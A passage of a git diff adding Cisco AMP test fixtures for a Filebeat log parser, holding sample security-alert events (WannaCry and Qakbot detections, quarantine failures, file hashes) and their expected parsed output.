"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802581", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 59258, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802580", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" 
+ ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 60451, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 644000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + 
"file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 61637, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4688, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204901661835277", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 802000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + 
"host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 65559, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log new file mode 100644 index 000000000000..9842f3cbe934 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log 
@@ -0,0 +1,49 @@
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. 
It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
